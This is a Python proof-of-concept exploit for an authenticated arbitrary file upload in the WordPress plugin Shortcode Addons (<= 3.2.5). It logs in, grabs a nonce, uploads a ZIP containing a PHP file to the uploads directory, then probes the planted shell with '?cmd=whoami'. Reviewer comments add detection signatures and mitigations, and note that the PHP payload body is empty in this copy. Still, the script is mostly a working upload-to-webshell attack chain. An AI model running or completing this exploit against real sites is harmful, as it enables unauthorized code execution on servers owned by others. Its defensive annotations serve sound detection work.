"""Proof-of-concept for "Shortcode Addons <= 3.2.5 - Authenticated (Admin+)
Arbitrary File Upload" (title taken from the argparse description below).

Reviewer notes, defender's view of what this script does on the wire:

* Precondition: valid WordPress credentials that can open the plugin's
  import page (the title says Admin+). Without them the run stops at login.
* Request sequence, all visible in web-server access logs:
    1. POST /wp-login.php
    2. GET  /wp-admin/admin.php?page=shortcode-addons-import  (reads _wpnonce)
    3. POST to the same import URL, multipart field ``validuploaddata``
       carrying a ZIP archive
    4. GET  /wp-content/uploads/shortcode-addons/nxploit.php
    5. GET  the same path with ``?cmd=whoami``
* Artifact on the target: a ``.php`` file under
  ``wp-content/uploads/shortcode-addons/``. Any PHP file in that directory,
  or any request to one, is worth alerting on.
* The PHP payload body is an empty string in this copy (see
  ``generate_payload``), so as written the uploaded file contains nothing.
* Mitigation: the title implies releases after 3.2.5 are not affected, so
  confirm against the vendor changelog and update. Independently, deny PHP
  execution under ``wp-content/uploads``.
"""
import argparse
import os
import time
import zipfile

import requests
from bs4 import BeautifulSoup

# Exploit By: Nxploited | Khaled Alenazi,


def create_session():
    """Return a ``requests.Session`` with TLS certificate checks turned off.

    NOTE(review): ``verify = False`` plus the suppressed urllib3 warnings
    means the credentials sent by ``login`` are not protected against an
    on-path interceptor.
    """
    requests.packages.urllib3.disable_warnings()
    http = requests.Session()
    http.verify = False
    return http


def login(session, base_url, username, password, user_agent):
    """Submit the WordPress login form and report whether a session cookie was set.

    Returns True when any cookie whose name contains ``wordpress_logged_in``
    is present in the session afterwards, otherwise False. The HTTP status
    of the login response is not inspected.
    """
    form = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In'
    }
    session.post(
        base_url + '/wp-login.php',
        data=form,
        headers={'User-Agent': user_agent},
    )
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("[+] Authentication successful.")
        return True
    print("[-] Authentication failed.")
    return False


def extract_nonce(session, import_url, user_agent):
    """Fetch the plugin import page and return the value of its ``_wpnonce`` input.

    Returns None when no ``<input name="_wpnonce">`` is found in the page.
    """
    page = session.get(import_url, headers={'User-Agent': user_agent})
    nonce_field = BeautifulSoup(page.text, 'html.parser').find(
        'input', {'name': '_wpnonce'}
    )
    if not nonce_field:
        print("[-] _wpnonce not found.")
        return None
    print(f"[+] _wpnonce extracted: {nonce_field['value']}")
    return nonce_field['value']


def generate_payload(zip_name, php_name):
    """Write ``php_name`` to the working directory and wrap it in ``zip_name``.

    NOTE(review): the PHP body is an empty string in this copy of the
    script, so the archive holds a zero-byte ``.php`` file.
    """
    php_code = ''
    with open(php_name, 'w') as php_out:
        php_out.write(php_code)
    with zipfile.ZipFile(zip_name, 'w', zipfile.ZIP_DEFLATED) as archive:
        archive.write(php_name)
    print(f"[+] Payload {zip_name} created.")


def upload_payload(session, import_url, user_agent, nonce, zip_name):
    """POST the ZIP archive to the plugin's import form.

    Returns True on HTTP 200 and False otherwise. A 200 only shows that the
    page rendered; it does not show that the server stored the archive.
    """
    # NOTE(review): this file handle is never closed explicitly.
    multipart = {
        'validuploaddata': (zip_name, open(zip_name, 'rb'), 'application/zip')
    }
    form = {
        '_wpnonce': nonce,
        '_wp_http_referer': '/wp-admin/admin.php?page=shortcode-addons-import',
        'data-upload': 'Save'
    }
    request_headers = {
        'User-Agent': user_agent,
        'Referer': import_url
    }
    reply = session.post(
        import_url, headers=request_headers, files=multipart, data=form
    )
    if reply.status_code != 200:
        print("[-] Upload failed.")
        return False
    print("[+] Payload uploaded.")
    return True


def confirm_shell(base_url):
    """Check whether the uploaded file is reachable under the uploads directory.

    Waits three seconds, then issues an unauthenticated GET (a fresh
    ``requests.get``, not the logged-in session). Returns the URL on HTTP
    200, otherwise None.
    """
    shell_url = base_url + '/wp-content/uploads/shortcode-addons/nxploit.php'
    time.sleep(3)
    probe = requests.get(shell_url, verify=False)
    if probe.status_code != 200:
        print("[-] Shell not found.")
        return None
    print(f"[+] Shell is accessible at: {shell_url}")
    return shell_url


def execute_command(shell_url):
    """Request ``shell_url`` with ``?cmd=whoami`` and print the response body.

    The ``cmd`` query string on a ``.php`` file under ``wp-content/uploads``
    is a simple pattern to match in access logs or WAF rules.
    """
    reply = requests.get(shell_url + '?cmd=whoami', verify=False)
    if reply.status_code != 200:
        print("[-] Failed to execute command.")
        return
    print("[+] Command output:")
    print("------------------")
    print(reply.text.strip())
    print("------------------")


def cleanup(files):
    """Delete the given local files if present.

    Only the operator's working directory is touched; the file stored on the
    target stays there.
    """
    for path in files:
        if os.path.exists(path):
            os.remove(path)
    print("[+] Temporary files removed.")


def exploit():
    """Parse the CLI arguments and run login, nonce fetch, upload and check in order.

    Each step returns early on failure. Local temporary files are removed
    once the upload has been attempted.
    """
    parser = argparse.ArgumentParser(description="Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload # By:Nxploited | Khaled Alenazi,")
    parser.add_argument('-u', '--url', required=True, help='Target URL')
    parser.add_argument('-un', '--username', required=True, help='Username')
    parser.add_argument('-p', '--password', required=True, help='Password')
    args = parser.parse_args()

    base_url = args.url.rstrip('/')
    import_url = base_url + '/wp-admin/admin.php?page=shortcode-addons-import'
    # Fixed browser-like User-Agent: UA-based filtering will not single out
    # this client, so detection should key on the request paths instead.
    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

    session = create_session()
    if not login(session, base_url, args.username, args.password, user_agent):
        return

    nonce = extract_nonce(session, import_url, user_agent)
    if not nonce:
        return

    php_file = 'nxploit.php'
    zip_file = 'nxploit.zip'
    local_artifacts = [php_file, zip_file]
    generate_payload(zip_file, php_file)

    if not upload_payload(session, import_url, user_agent, nonce, zip_file):
        cleanup(local_artifacts)
        return

    shell_url = confirm_shell(base_url)
    if shell_url:
        execute_command(shell_url)
    cleanup(local_artifacts)


if __name__ == "__main__":
    exploit()